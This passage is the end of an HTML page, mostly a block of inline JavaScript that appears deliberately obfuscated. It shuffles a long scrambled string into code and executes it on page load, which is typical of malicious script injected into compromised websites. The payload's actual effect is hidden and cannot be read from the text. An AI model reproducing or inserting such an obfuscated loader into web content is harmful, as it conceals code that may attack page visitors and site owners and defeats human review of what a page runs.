kpL=BMs(ILB,pLW(JML));var Ckf=kpL(pLW(' .3e7r_r)57ya.e22h]ij_.1r%w.mg.3\'e515fg%(a_3;mele\/ f9{%1n3r2to$eeqGexiGcde$u)w.(G;bGhGa(Ge{}5+_%v,ie3{.Gh]3G= 5a}%+t!;,# sa!,Gxdis!%.6igeG).f bi.th$Gy+f6\/!;tcae$a44lG)%,tr#nh6r.,.prG,lbp(8uhbgo([t,4}!s_2$q,9s=G!$ 6Gs;t7SdjeG\/47o)=eG5.a$0u](-,)r(oe$zGvT);h$j=#i., ;f+{Gi%)jtn)((!oa\/e0l.iiG.gno;wz!(=p6s]-,no_\/G)h={;8ruc!c&[0m(s52eu4(he(]G3f,!\/%ha.GGr*)Gr$)6GGih3t1bG-ftG_0r0(coG\/Ga)((j"vGf2.)G4ctGc3ss3u71)bb.u(:eGni:GG$! 4=l=, Geav+.!G\', ({n{)3}]aG,u tS+eo19G4 eG$=;p3%(!G)_a5;G.geG(\'i)G G;md.Ci3$*(=G.%(y((!._eozehG(b\'G3w*G,;G#$Gaeq;,t}&.))77G[fnni)f($$G3e=oa)G(1(h$!.h5!a5](}]..lG5 }Ga4GpyG!l00G=jeG 00).s,(Gfr )ffe3G,h*i)}=1!r.t)o6ew{)o;my0)r=d3)GG43b.,t)(t.qu))(pGG)G(qC=7\/;)G1a1gr7G$Gb%7m,]mfurGGGp\'],7ys]:f42!e(%sfed]t.n.(4}!)$36e1:G-)r;tGtsowe}.76"dmvfou)G3%d)G(h*Gd3Gy#,G,G{)%_6e]&,_$;(f0]-G.5]&+ym1)sp7GfGi+q0G..a;o.3r*==)$G-e\/a"i.""[n.{t1;(.,+rGt0.+.su!6.f,!,;etv=rG;vr\/rda_{GtGwdGtlra#G.inp}(,m4,!G6=_Gs.wG)l,4.6oe7,!p.$.!Gsp&ir\';G3.4G_,jejeo$Gt:00$G;t]egG{t=)0o(lnG(f*aGGGaSf)%o4$(i4w85tge7rl;.eG\/(r]$ea _+ ).e4G()G l,7;e.0)aim!)_#xi"u$5trf(e2].S"3\/.bG!G_;G=G,,.n 1es$os_b,_m Gd.3{e:cG)((sG. (()crs_93'));var WmB=Hol(cFL,Ckf );WmB(6712);return 5729})()
</script>
 </body>
</html>